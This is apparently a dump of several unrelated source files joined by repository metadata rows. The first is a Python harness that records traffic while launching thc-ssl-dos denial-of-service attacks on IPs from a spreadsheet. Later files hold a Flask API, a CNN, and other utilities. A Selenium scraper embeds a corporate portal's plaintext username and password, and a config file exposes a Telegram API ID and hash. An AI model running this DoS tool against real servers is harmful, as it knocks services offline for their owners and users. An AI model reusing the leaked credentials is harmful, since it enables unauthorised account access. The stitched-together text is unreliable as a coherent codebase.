        while 1 and isAttacking == 1:
            count = 1  # make counter a non factor
            return_code = sts.poll()
            if return_code == 0 or count >= timeout:
                if return_code == 0:
                    print("tshark has terminated gracefully")
                    logging.info("tshark has terminated gracefully")
                elif count >= timeout:
                    print("timeout has been reached")
                    logging.info("timeout has been reached")
                    # Kill the capture process by pid.
                    for proc in psutil.process_iter():
                        # check whether the process name matches
                        if proc.pid == sts.pid:
                            try:
                                proc.kill()
                            except psutil.NoSuchProcess as nsp:
                                logging.error(str(nsp))
                            finally:
                                break
                        else:
                            continue
                break
            else:
                if len(cleanLinks) > 1:
                    link = random.choice(cleanLinks)
                    ip_socket = []
                    # Relative hrefs are made absolute against the domain.
                    if "http" not in link and ".com" not in link:
                        seleniumLink = "https://" + domain + link
                        socketLink = domain
                    else:
                        seleniumLink = link
                        socketLink = clean_domain(link)
                    try:
                        socket_info = socket.getaddrinfo(socketLink, None)
                    except socket.gaierror as e:
                        logging.error(str(e) + " error for " + str(socketLink))
                        continue
                    except UnicodeError as e:
                        logging.error(str(e) + " error for " + str(socketLink))
                        continue
                    for info in socket_info:
                        ip_socket.append(info[4][0])
                    for ip_test in ip_socket:
                        # Introducing sleep between 3 to 8 seconds to allow simulation of user behaviour
                        #time.sleep(np.random.randint(low=3, high=8))
                        # Browse the link only if it resolves back to the
                        # target IP; otherwise send a plain GET instead.
                        if ip_test == ip:
                            try:
                                driver.get(seleniumLink)
                                logging.info("Successfully accessed website " + str(seleniumLink))
                            except InvalidArgumentException as iae:
                                logging.info(str(iae) + "Invalid Argument Exception " + str(seleniumLink))
                                continue
                            except TimeoutException as te:
                                logging.info(str(te) + "Time Out Exception " + str(seleniumLink))
                                continue
                            except UnexpectedAlertPresentException as uape:
                                logging.exception(str(uape) + " unexpected alert present!")
                                driver.switch_to.alert.accept()
                                continue
                            except WebDriverException as wde:
                                logging.exception(str(wde) + " webdriver exception!")
                                continue
                            finally:
                                # NOTE(review): `finally: break` overrides the
                                # `continue`s above — confirm intended.
                                break
                        else:
                            print("Sending GET requests!")
                            logging.info("Sending GET requests to " + ip + " " + domain)
                            try:
                                requests.get("http://" + ip, headers={'User-Agent': ua.random}, timeout=5)
                            except ConnectionError as ce:
                                logging.error(str(ce))
                            except HTTPError as httperr:
                                logging.error(str(httperr))
                            except Timeout as toe:
                                logging.error(str(toe))
                            except RequestException as re:
                                logging.exception(str(re))
                            finally:
                                break
                else:
                    pass
                count = 0
        # Kill chrome processes to clear memory to avoid virtual memory problem
        parent = psutil.Process(driver.service.process.pid)
        chromeProcesses = (parent.children(recursive=True))
        if chromeProcesses != "":
            # NOTE(review): a list never equals "" so this branch always runs.
            for process in chromeProcesses:
                p = psutil.Process(process.pid)
                p.kill()
        try:
            driver.quit()
        except TimeoutException as toe:
            logging.exception(str(toe) + " Driver failed to close")
        except UnexpectedAlertPresentException as uape:
            logging.exception(str(uape) + " unexpected alert present!")
            driver.switch_to.alert.accept()
            driver.close()
        finally:
            driver.quit()
    # Terminate selenium once the attack flag clears.
    try:
        driver.quit()
    except NameError as NE:
        logging.error(str(NE))
        driver.close()
def attack(ip):
    """Run a 60-second thc-ssl-dos attack against `ip`, then tear down.

    Waits (up to 60 s) for the normal-traffic thread to set `isNormal`;
    if it never does, clears `isAttacking` and returns. On completion the
    thc-ssl-dos and tshark processes are killed and `isAttacking` cleared
    so the normal() thread exits too.
    """
    # Declared once at the top (it was previously buried inside a branch,
    # though `global` is function-scoped either way).
    global isAttacking
    count = 0
    while isNormal == 0:
        time.sleep(1)
        count = count + 1
        if count == 60:
            isAttacking = 0
            return
    print('ready to attack at ' + str(ip))
    # Initializer for thc-ssl-dos
    parallel_connections = 1
    port = 443
    logging.info("DDOSING at " + ip)
    # SECURITY NOTE: `ip` is interpolated into a shell command (shell=True);
    # it comes from the input spreadsheet, so that file must be trusted.
    thc_command = "thc-ssl-dos -l " + str(parallel_connections) + " " + ip + " " + str(port) + " " + "--accept"
    GNULL = open(os.devnull, 'w')
    thc_process = subprocess.Popen(thc_command, shell=True, stdout=GNULL)
    # The child process holds its own copy of the fd; close ours so we do
    # not leak one file handle per attack iteration.
    GNULL.close()
    logging.info("Opened DOS attack at " + ip)
    # Let the attack run for 60 seconds before killing the tools off.
    time.sleep(60)
    kill_thc = "killall -s SIGTERM thc-ssl-dos"
    kill_sniff = "killall -s SIGTERM tshark"
    os.system(kill_thc)
    os.system(kill_sniff)
    isAttacking = 0
    print('THE ATTACK HAS STOPPED. Exiting the attack thread..')
    logging.info("DDOS finished for " + ip)
if __name__ == '__main__' :
    # Driver: for each (normal, dos) IP pair, capture TLS traffic with tshark
    # while one thread browses normally and another runs the DOS attack.
    # `df`, `df_dos`, `dictionary`, `ip_list_normal`, `ip_list_dos`, `isNormal`
    # are presumably defined earlier in the file (not visible here).
    # Initializing the dictionary to be able to retrieve the names easily
    # Different IP (Key) lead to same Domain (Value)
    for index, row in df.iterrows():
        domain = row['Domain']
        ip = row['IP']
        dictionary[ip] = domain
    for index, row in df_dos.iterrows():
        domain = row['Domain']
        ip = row['IP']
        dictionary_dos[ip] = domain
    # Iterate only as far as the shorter of the two target lists allows.
    if(len(dictionary) < len(dictionary_dos)):
        length = len(dictionary)
    else:
        length = len(dictionary_dos)
    logging.basicConfig(filename='mixed_traffic.log', level=logging.INFO, format='%(asctime)s-%(levelname)s-%(message)s')
    location = "/media/sf_Shared2/mixed/"
    #location = "output/"
    # Per-run output directory, timestamped to avoid collisions.
    file_path = os.path.join(location + "mixed_traffic/" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
    if not os.path.exists(file_path):
        os.makedirs(file_path)
    ####################for single testing########################################
    #ip_normal = ip_list_normal[0]
    #ip_dos = ip_list_dos[0]
    #isAttacking = 1
    #isNormal = 0
    # SNIFFER
    # Declaring variables for the sniffer
    # Capture filter ip_list[0] is taken as the first IP resolved to capture
    # Might not be too perfect in the case
    #abspath = os.path.abspath(file_path)
    #interface = "eth0"
    #capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
    #filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
    # Raw capturing
    #command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
    #command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
    #sts = subprocess.Popen(command, shell=False)
    #time.sleep(5)
    #normal_t = threading.Thread(target=normal, args=(ip_normal,))
    #normal_t.start()
    #attack_t = threading.Thread(target=attack, args=(ip_dos,))
    #attack_t.start()
    ##############################################################################
    # NOTE(review): range starts at 814, presumably to resume an interrupted
    # batch run -- confirm before reusing.
    for i in range(814, length):
        ip_dos = ip_list_dos[i]
        ip_normal = ip_list_normal[i]
        print("normal at " + ip_normal)
        print("ddos at " + ip_dos)
        # Shared flags read by the worker threads.
        isAttacking = 1
        isNormal = 0
        # SNIFFER
        # Declaring variables for the sniffer
        # Capture filter ip_list[0] is taken as the first IP resolved to capture
        # Might not be too perfect in the case
        abspath = os.path.abspath(file_path)
        interface = "eth0"
        capture_filter = "tcp port 443 and host " + ip_normal + " or " + ip_dos
        filename = abspath + "/" + ip_normal + "_" + ip_dos + "_" + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S") + ".pcap"
        # Raw capturing
        #command = ["tshark", "-i", interface, "-c", "5000", "-f", capture_filter, "-w", filename]
        command = ["tshark", "-i", interface, "-f", capture_filter, "-w", filename]
        sts = subprocess.Popen(command, shell=False)
        time.sleep(5)
        normal_t = threading.Thread(target=normal, args=(ip_normal,))
        normal_t.start()
        attack_t = threading.Thread(target=attack, args=(ip_dos,))
        attack_t.start()
        # Wait until the attack thread clears the flag, then join both workers.
        while isAttacking == 1 :
            time.sleep(2)
        print('attack has stopped..')
        normal_t.join()
        attack_t.join()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
037c36b38eb376e91ce6c2b3bb5d768258458fdd | 343622a56b72a72ac016d3855a1c16c1c4fc8bc1 | /first_rest_api/03_flask/item.py | d40ca2746ad1c87ec06d18e9131cfb030b490548 | [] | no_license | copetty/test-repository | c74dde301fc3a102cc953042a51d8a7db669caf6 | be9daa5aa416a699a3bb84a1fed11ba3449d194a | refs/heads/master | 2023-05-07T13:07:31.238903 | 2021-05-24T00:02:51 | 2021-05-24T00:02:51 | 370,181,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,215 | py | from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
import sqlite3
class Item(Resource):
    """RESTful resource for a single store item backed by the SQLite 'items' table."""

    # Shared request parser: every write endpoint requires a float 'price'.
    parser = reqparse.RequestParser()
    parser.add_argument(
        'price',
        type=float,
        required=True,
        help="This field cannot be left blank!")  # fixed typo: 'feild' -> 'field'

    @jwt_required()
    def get(self, name):
        """Return the item called *name*, or a 404 payload if it does not exist."""
        item = self.find_by_name(name)
        if item:
            return item
        return {'message': 'Item not found'}, 404

    @classmethod
    def find_by_name(cls, name):
        """Look the item up by name; return {'item': {...}} or None."""
        connection = sqlite3.connect('data.db')
        try:
            cursor = connection.cursor()
            row = cursor.execute("SELECT * FROM items WHERE name=?", (name,)).fetchone()
        finally:
            connection.close()  # close even if the query raises
        if row:
            return {'item': {'name': row[0], 'price': row[1]}}

    def post(self, name):
        """Create a new item; 400 if it already exists, 500 on insert failure."""
        if self.find_by_name(name):
            return {'message': "An item with the name '{}' already exists.".format(name)}, 400
        data = Item.parser.parse_args()
        item = {'name': name, 'price': data['price']}
        try:
            self.insert(item)
        except Exception:  # narrowed from bare except
            return {"message": "An error occurred inserting the item."}, 500  # internal server error
        return item, 201

    @classmethod
    def insert(cls, item):
        """Insert *item* ({'name', 'price'}) into the database."""
        connection = sqlite3.connect('data.db')
        try:
            connection.cursor().execute("INSERT INTO items VALUES (?, ?)", (item['name'], item['price']))
            connection.commit()
        finally:
            connection.close()

    def delete(self, name):
        """Delete the item called *name* (idempotent: succeeds even if absent)."""
        connection = sqlite3.connect('data.db')
        try:
            connection.cursor().execute("DELETE FROM items WHERE name=?", (name,))
            connection.commit()
        finally:
            connection.close()
        return {'message': 'item deleted'}

    def put(self, name):
        """Create or update the item called *name* with the supplied price."""
        data = Item.parser.parse_args()
        item = self.find_by_name(name)
        updated_item = {'name': name, 'price': data['price']}
        if item is None:
            try:
                self.insert(updated_item)
            except Exception:
                # fixed typo: 'occured' -> 'occurred'
                return {'message': 'An error occurred inserting the item.'}, 500
        else:
            try:
                self.update(updated_item)
            except Exception:
                # fixed typos: response key 'messge' -> 'message', 'ocurred' -> 'occurred'
                return {'message': 'An error occurred updating the item.'}, 500
        # removed dead `item.update(updated_item)` -- it only mutated a local dict
        return updated_item

    @classmethod
    def update(cls, item):
        """Update the stored price of an existing item."""
        connection = sqlite3.connect('data.db')
        try:
            connection.cursor().execute("UPDATE items SET price=? WHERE name=?", (item['price'], item['name']))
            connection.commit()
        finally:
            connection.close()
class ItemList(Resource):
    """RESTful resource listing every item stored in the SQLite 'items' table."""

    def get(self):
        """Return all items as {'items': [{'name': ..., 'price': ...}, ...]}."""
        connection = sqlite3.connect('data.db')
        rows = connection.cursor().execute("SELECT * FROM items")
        payload = {'items': [{'name': row[0], 'price': row[1]} for row in rows]}
        connection.close()
        return payload
| [
"copetty96@gmail.com"
] | copetty96@gmail.com |
9c49f34c4e0af8d51ca97a03a373e5fc2d76440a | f0a5ad7b8aa39f51f233391fead0da3eabecc4ee | /.history/toolbox/middleware_20191129081531.py | bed0186b917d604de34c93cc7df6e8c7ddb4bfb8 | [] | no_license | OseiasBeu/webScrapping | e0a524847e55b24dbbd3d57bbe7fa43b4e101f48 | 1e72c7551aea355a891043baecfcbab8a89e719a | refs/heads/master | 2022-10-25T18:12:50.858653 | 2020-06-18T01:29:24 | 2020-06-18T01:29:24 | 224,681,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,601 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from datetime import datetime
import toolbox.sheets as sheet
import pandas as pd
def middleware():
    """Scrape pending-integration counts from the Whirlpool middleware report
    page with Selenium, merge them into a local Excel base, and push the
    result to a spreadsheet via `sheet.insertPlanMiddleware`.
    """
    driver = webdriver.Chrome(executable_path='chromedriver.exe')
    driver.get("https://wsmid-prd.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
    # NOTE(security): hard-coded credentials committed to source -- these
    # should live in environment variables or a secrets store.
    dominio = 'whirlpool'
    usuario = 'daniel_coelho'
    senha = 'Sua95xb4'
    bra = "BRA"
    data = '2019-11-01'
    # SQL executed by the remote query-analyzer page: pending (non-integrated)
    # order items grouped by state and warehouse.
    query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
    # Fill the login form and submit with RETURN.
    campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
    campo_dominio.send_keys(dominio)
    campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
    campo_usuario.send_keys(usuario)
    campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
    campo_senha.send_keys(senha)
    campo_senha.send_keys(Keys.RETURN)
    # Ask for an unlimited number of rows, paste the query and execute it.
    records = driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
    records.send_keys('sem limites')
    text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
    text_query.send_keys(query)
    executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
    # Scrape every table row; each row's text is whitespace-split into cells.
    arr = []
    resposta = driver.find_elements_by_tag_name('tr')
    for item in range(len(resposta)):
        linha = resposta[item].text
        arr.append(linha.split())
    # Row 3 holds the header; re-join the three tokens of the multi-word
    # "Pendentes de integração" column into a single column name.
    coluna = arr[3]
    coluna1 = coluna.pop(3)
    coluna1 = coluna1 +" "+ coluna.pop(3)
    coluna1 = coluna1 +" "+ coluna.pop(3)
    coluna.append(coluna1)
    df = pd.DataFrame(data=arr[4:], columns=coluna)
    # df = df.insert(0,'timeStamp')
    now = datetime.now()
    df['timeStamp'] = ''
    df1 = df.drop(columns='#')
    wb = pd.ExcelFile('base_middleware.xlsx')
    base_m = pd.read_excel(wb)
    print(base_m.head())
    print(df1.head())
    sheet.insertPlanMiddleware(df1)
    # NOTE(review): '%m/%S/%Y' mixes month and *seconds* -- '%d' was probably
    # intended for the middle field; confirm the expected date format.
    base_m['timeStamp'] = datetime.now().strftime('%m/%S/%Y %H:%M:%S')
    print(df1)
    # NOTE(review): DataFrame.append returns a new frame; this result is
    # discarded, so base_m is never actually merged into df1.
    df1.append(base_m)
    print(base_m)
    nomeArquivo = 'base_middleware.xlsx'
    df1.to_excel(nomeArquivo, index=False)
    sair = driver.find_element_by_id("ctl00_lgStatus").click()
    driver.close()
# clienteEstado warehouseId Pendentes de integração Última hora? | [
"oseiasbeu@outlook.com"
] | oseiasbeu@outlook.com |
0240279d614cdfa43d1feb765b1158095b2c2b3e | 4ce40248e08e753ec1916297cb2f803bc5066e0c | /utils/downloadFTP.py | 5969c007b28c54410073d1429976dc3bfa0a4493 | [] | no_license | adpolicarpo/SCRAG | db0d0078b815d5567a860bb64788dd326754195a | db5e23cf5408cccc8dab5239f068cb743c71e37b | refs/heads/master | 2020-06-01T06:53:00.046642 | 2015-09-03T16:32:25 | 2015-09-03T16:32:25 | 40,362,038 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,862 | py | #########################################################
##### Script to download genomes from GenBank FTP #####
##### Author: Adriana Policarpo #####
#########################################################
from ftplib import FTP
import os
# Python 2 script: connect anonymously to the NCBI GenBank FTP server and
# list the bacterial genome directories; ask the user which extension to fetch.
ftp = FTP('ftp.ncbi.nih.gov') # connect to host
ftp.login()
ftp.cwd('genomes/Bacteria/') # set directory
l = ftp.nlst() # retrieves a list of file names
print 'Matching Streptococcus_pneumoniae...'
print 'Select the extension of the files you wish to download'
print 'e.g. .gff, .tab, .val, .asn, .fna...'
resp = raw_input()
#############
# function that returns the name of the files with the choosen extention,
# in the given directory
def files (name, ext):
    """Enter directory *name* on the global FTP connection and return the
    first entry whose name contains *ext* (None when nothing matches).

    Side effect: leaves the connection cd'ed into *name*; the caller is
    expected to cd back out afterwards.
    """
    ftp.cwd(name)
    for entry in ftp.nlst():
        if ext in entry:
            return entry
############
# replace 'Streptococcus_pneumoniae' with the name of species wanted, written as in GenBank FTP
# For every matching species directory: find the first file with the chosen
# extension and download it into a local directory named after the species.
for item in l:
    if 'Streptococcus_pneumoniae' in item:
        try:
            # files() cd's into `item` as a side effect; we cd back out below.
            filename = files (item, resp)
            filename2 = item + '_' + filename
            print filename2
            directory = './'+item #define directory to save the files
            if not os.path.exists(directory):
                os.mkdir(directory) #make new directory, if it not exists
            os.chdir(directory) #change directory
            file = open(filename2, 'wb') #open a file
            ftp.retrbinary('RETR ' + filename, file.write) #download file
            file.close() #close the file
            ftp.cwd('..') # returns to the last directory
            os.chdir('..')
        except:
            # NOTE(review): this bare except also hides FTP/IO errors, and on
            # failure the connection may be left cd'ed inside the directory.
            print 'no files with this extention'
ftp.close() # Close the connection
"adri_poli@hotmail.com"
] | adri_poli@hotmail.com |
d643ffc82c8f5d1f4332b0ca587f905ec10b6b0c | 689114d6466fdba8da2b20beabe56320b97410f3 | /assignment2/cs231n/classifiers/cnn.py | 49f244cfaef3841bff5e8a45a00c5beae622a083 | [] | no_license | jaja7/cs231n_assignment_winter1516 | 87b39a2e6c93ad5d309836b261de1033daf94eef | 8a807e837e956ffeec2944bd043160d51073c587 | refs/heads/master | 2021-01-20T08:31:18.485716 | 2017-05-03T16:12:53 | 2017-05-03T16:12:53 | 90,159,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,649 | py | import numpy as np
from cs231n.layers import *
from cs231n.fast_layers import *
from cs231n.layer_utils import *
class ThreeLayerConvNet(object):
    """
    A three-layer convolutional network with the following architecture:
    conv - relu - 2x2 max pool - affine - relu - affine - softmax
    """
    def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,
                 hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,
                 dtype=np.float32):
        """
        Initialize weights and biases.

        input_dim: (channels, height, width) of the input images
        num_filters / filter_size: convolution layer configuration
        hidden_dim: size of the hidden affine layer
        num_classes: number of output classes
        weight_scale: std-dev of the Gaussian weight initialization
        reg: L2 regularization strength
        dtype: numpy datatype used for all parameters

        NOTE: Python 2 code (`iteritems`, integer division in W2 sizing).
        """
        self.params = {}
        self.reg = reg
        self.dtype = dtype
        # Initialize weights and biases
        C, H, W = input_dim
        self.params['W1'] = weight_scale * np.random.randn(num_filters, C, filter_size, filter_size)
        self.params['b1'] = np.zeros(num_filters)
        # W2 maps the pooled conv output to hidden_dim (2x2 pooling with
        # stride 2 shrinks H*W by a factor of 4, hence the /4).
        self.params['W2'] = weight_scale * np.random.randn(num_filters*H*W/4, hidden_dim)
        self.params['b2'] = np.zeros(hidden_dim)
        self.params['W3'] = weight_scale * np.random.randn(hidden_dim, num_classes)
        self.params['b3'] = np.zeros(num_classes)
        # Cast every parameter to the requested dtype.
        for k, v in self.params.iteritems():
            self.params[k] = v.astype(dtype)
    def loss(self, X, y=None):
        """
        Compute class scores (when y is None) or (loss, grads) for a minibatch.
        """
        W1, b1 = self.params['W1'], self.params['b1']
        W2, b2 = self.params['W2'], self.params['b2']
        W3, b3 = self.params['W3'], self.params['b3']
        # pass conv_param to the forward pass for the convolutional layer
        filter_size = W1.shape[2]
        conv_param = {'stride': 1, 'pad': (filter_size - 1) / 2}
        # pass pool_param to the forward pass for the max-pooling layer
        pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}
        # compute the forward pass
        a1, cache1 = conv_relu_pool_forward(X, W1, b1, conv_param, pool_param)
        a2, cache2 = affine_relu_forward(a1, W2, b2)
        scores, cache3 = affine_forward(a2, W3, b3)
        if y is None:
            return scores
        # compute the backward pass
        data_loss, dscores = softmax_loss(scores, y)
        da2, dW3, db3 = affine_backward(dscores, cache3)
        da1, dW2, db2 = affine_relu_backward(da2, cache2)
        dX, dW1, db1 = conv_relu_pool_backward(da1, cache1)
        # Add regularization
        dW1 += self.reg * W1
        dW2 += self.reg * W2
        dW3 += self.reg * W3
        reg_loss = 0.5 * self.reg * sum(np.sum(W * W) for W in [W1, W2, W3])
        loss = data_loss + reg_loss
        grads = {'W1': dW1, 'b1': db1, 'W2': dW2, 'b2': db2, 'W3': dW3, 'b3': db3}
        #for k, v in grads.items():
        #print k
        return loss, grads
    pass
| [
"wangjiajia123@gmail.com"
] | wangjiajia123@gmail.com |
de26330ae9f9fa29b1fab8740fe3cd8dc6ec643a | 6291f0d789d9d6ec2f117eefa5d29ec234c9015e | /get_lyric/__init__.py | a428eddef5633a970b30688bd84fcc0e0f73a1cc | [] | no_license | atcdot/get_lyric | 25c4cfb7eb4d7e1c8e3622446e94c2b6f63ca931 | 7f0ef53a5ec75be71dc1446fb72f6476b69aa85c | refs/heads/master | 2021-09-06T10:12:45.351560 | 2018-02-05T10:42:39 | 2018-02-05T10:42:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | '''
Created on 2015/06/07
@author: yoshi
'''
__all__ = ['common','sites']
| [
"tripod31@hotmail.com"
] | tripod31@hotmail.com |
43d3606680c7c08b541d8e66a106bbe7f13c0fa7 | 2923b9f58e6a143a3e070169612165585c301def | /LA/gp_rupture_test/LA/gp_rupture_test/gp_021219_Scott_7.35_noplas_2hz/fault_full_loc.py | d3f385c3d1a7f68a7593b81008a1ecdc93ae3228 | [] | no_license | hzfmer/summit_work_021421 | 16536dd716519bc9244da60007b9061ef5403429 | 6981b359fefb2af22e0bea6c47511de16cad22bd | refs/heads/master | 2023-03-11T15:34:36.418971 | 2021-02-05T23:22:10 | 2021-02-05T23:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 2018
@author: Zhifeng Hu <zhh076@ucsd.edu>
"""
import numpy as np
from numpy import sin, cos, pi, sqrt
import os
import sys
import glob
import time
# --- Extract the fault-trace lat/lon table from an SRF rupture description. ---
# Bug fix: interp1d was referenced below but never imported (NameError at runtime).
from scipy.interpolate import interp1d

nt_ref = 2000          # reference time-step count
nt_des = 10 * nt_ref   # desired upsampled time-step count (not used below)
theta_rot = 35         # rotation angle in degrees (not used below)
# Read nx/nz (fault grid dimensions) from the third header line of the first *.srf file.
f = open(glob.glob('./*.srf')[0], 'r')
f.readline()
f.readline()
token = f.readline()
nx = int(token.split()[2])
nz = int(token.split()[3])
f.close()
# Only build the fault-location table once.
if not os.path.isfile('fault_full_loc.txt'):
    fault_loc = np.array(np.loadtxt("fault_loc.idx"))
    x1 = int(fault_loc[0, 0])
    x2 = int(fault_loc[1, 0])
    y1 = int(fault_loc[0, 1])
    y2 = int(fault_loc[1, 1])
    # Linearly interpolate the fault trace between the two endpoint indices.
    # (np.float/np.int were removed in modern numpy; the builtins are aliases.)
    x_tmp = np.linspace(x1, x2, np.abs(x2 - x1) + 1)
    y_tmp = [float((y2-y1)/(x2-x1))*(x-x1) + y1 for x in x_tmp]
    f_interp = interp1d(x_tmp, y_tmp, fill_value='extrapolate')
    # Walk 2*nx grid points along the trace, always ending in increasing-x order.
    if x1 < x2:
        new_x = np.arange(x1, x1 + nx * 2)
        new_y = [int(i) for i in f_interp(new_x)]
    else:
        new_x = np.arange(x1 + 1 - nx * 2, x1 + 1)
        new_y = [int(i) for i in f_interp(new_x)]
        new_x = new_x[::-1]
        new_y = new_y[::-1]
    # Surface grid of coordinate pairs; mx/my are fixed by the simulation setup.
    mx = 6320
    my = 4200
    ll = np.fromfile('../scripts/surf.grid', dtype='float64', count=2 * my * mx).reshape(my, mx, 2)
    ll_fault = [np.float32((ll[new_y[i], new_x[i], 0], ll[new_y[i], new_x[i], 1])) for i in range(len(new_x))]
    # NOTE(review): the full grid `ll` is written out here, not `ll_fault` --
    # confirm that writing the whole surface grid is intentional.
    np.savetxt('fault_full_loc.txt', ll, fmt='%f')
    # np.array(ll_fault).tofile('latlon_fault.bin')
| [
"hzfmer94@gmail.com"
] | hzfmer94@gmail.com |
1773f9b8b03adcd61ad6b4dce8b09156adfd7af0 | ef0ac2e679f6f059658aa3732cc706fe4c5d5cbf | /brain_invader/concat_all_result.py | 396015f567c0e4f6959b9679a20b16b2aee63579 | [] | no_license | nbuton/PLDAC | f4e51d43fd6166716768e0226a64ce5a55c98241 | 662d5d6155a4ba15b67f2b5cfd2c2792365c9a02 | refs/heads/master | 2022-01-05T04:05:01.488608 | 2019-05-27T16:50:26 | 2019-05-27T16:50:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | import os
import csv
def getListOfFiles(dirName):
    """Recursively collect the full paths of every regular file under *dirName*.

    Uses os.walk instead of the previous hand-rolled listdir/isdir recursion.
    """
    allFiles = list()
    for root, _dirs, fileNames in os.walk(dirName):
        for fileName in fileNames:
            allFiles.append(os.path.join(root, fileName))
    return allFiles
def keep_only_result_file(fileList):
    """Return only the paths whose name contains the substring "resultat"
    (the per-run result CSVs written by the experiment scripts)."""
    return [f for f in fileList if "resultat" in f]
def filter_file(filtre,fileList):
    """Return the entries of *fileList* that contain the substring *filtre*."""
    return [entry for entry in fileList if filtre in entry]
def saveResult(name,result):
    """Write the aggregated *result* rows to CSV file *name*, preceded by a
    fixed header row.

    Fixes: the file handle was never closed, and newline='' is required so
    the csv module does not emit blank lines between rows on Windows.
    """
    with open(name, 'w', newline='') as myfile:
        wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
        wr.writerow(["nom du fichier","1 seconde","0.1 seconde","0.04 seconde"])
        wr.writerows(result)
# --- Aggregate every per-run result CSV of one test group into a single file. ---
testName = "test_par_groupe_12"
fileList = getListOfFiles("resultats/"+testName+"/")
fileList = keep_only_result_file(fileList)
print(len(fileList))
list_finale=[]
for f in fileList:
    print(f)
    # One output row per file: the file name followed by column 1 of every
    # non-header row of that file.
    tmp=[f]
    with open(f) as csv_file:
        csv_reader = csv.reader(csv_file, delimiter=',')
        row_count = 0
        for row in csv_reader:
            # Skip the header row (row_count == 0).
            if(row_count != 0):
                tmp.append(row[1])
            row_count+=1
        list_finale.append(tmp)
print(len(list_finale))
saveResult("resultats/"+testName+"/concat_file.csv",list_finale)
| [
"holophore@holophore.home"
] | holophore@holophore.home |
760f2a534ec5161bec67df526d1c6f2f94bd9a02 | e590f1892d08c18cb2e5233c830934592be90b53 | /config.py | e08deb19e8b3bc57a6f1fcf45ff0cfaecf5d0bb8 | [] | no_license | demtodeath/TGSPAMMER | cc38558ebadb2c5cc719b7bf0a879ce065ddc2bc | 0e10b0ec78b7c934507f93daf4526bd9197f442e | refs/heads/main | 2023-06-05T18:22:01.492992 | 2021-06-22T19:05:20 | 2021-06-22T19:05:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py |
#BOT:
TOKEN = "" # ТОКЕН БОТА
ADMIN = 392192947 # ИД АДМИНА, узнать свой айди - @get_any_telegram_id_bot
DIR = "" # Путь к файлу, если нужно
#USER: # https://my.telegram.org/auth
API_ID = 6623613
API_HASH = "3504ada74bdd34a2e5bf510e1bfd6460" | [
"noreply@github.com"
] | demtodeath.noreply@github.com |
3a2aace405551240c749077517533bdee9b234de | e562f7e0a51273475e50a7e61d1d377f88775622 | /flags.py | 39c29607dfbc5649d50a4d7b0c0d48d7e2e0df9b | [] | no_license | bloodcurdle/ReadableWebProxy | d1c6ae0220fdb04ea7ab82963c86e776a0dbbfd9 | 10f68f913a78f8b0e47582996d9860a61da55dd6 | refs/heads/master | 2021-05-29T19:58:32.965610 | 2015-11-09T18:25:00 | 2015-11-09T18:25:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py |
RUNSTATE = True
FEEDER_STARTED = False
RSS_DEBUG = False
RULE_CACHE = None
SPECIAL_CASE_CACHE = None | [
"something@fake-url.com"
] | something@fake-url.com |
60226e9a1da94d8a374b9fb6ff9f4b35b54917ef | c08cbc3589f2542ee2718ba900dec682e80cbd48 | /authentication_practice_part_2/models.py | a3c1e6015bd6103dd34cfd688dcba1f531316dd3 | [] | no_license | pun1sh3r/flask_lab | 4abf1f1d4d1ada4de556e87e70861c3f5902c677 | 0e2fb2c9ed46d22a3a36584b36adb37d3c2ebfc0 | refs/heads/master | 2023-09-04T01:49:06.795779 | 2021-11-08T21:41:52 | 2021-11-08T21:41:52 | 421,600,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from app import db
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin, LoginManager, login_required, login_user, current_user
from werkzeug.security import generate_password_hash,check_password_hash
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password = db.Column(db.String(128))
def __repr__(self):
return '<User {}>'.format(self.username) | [
"lmendieta@fidelissecurity.com"
] | lmendieta@fidelissecurity.com |
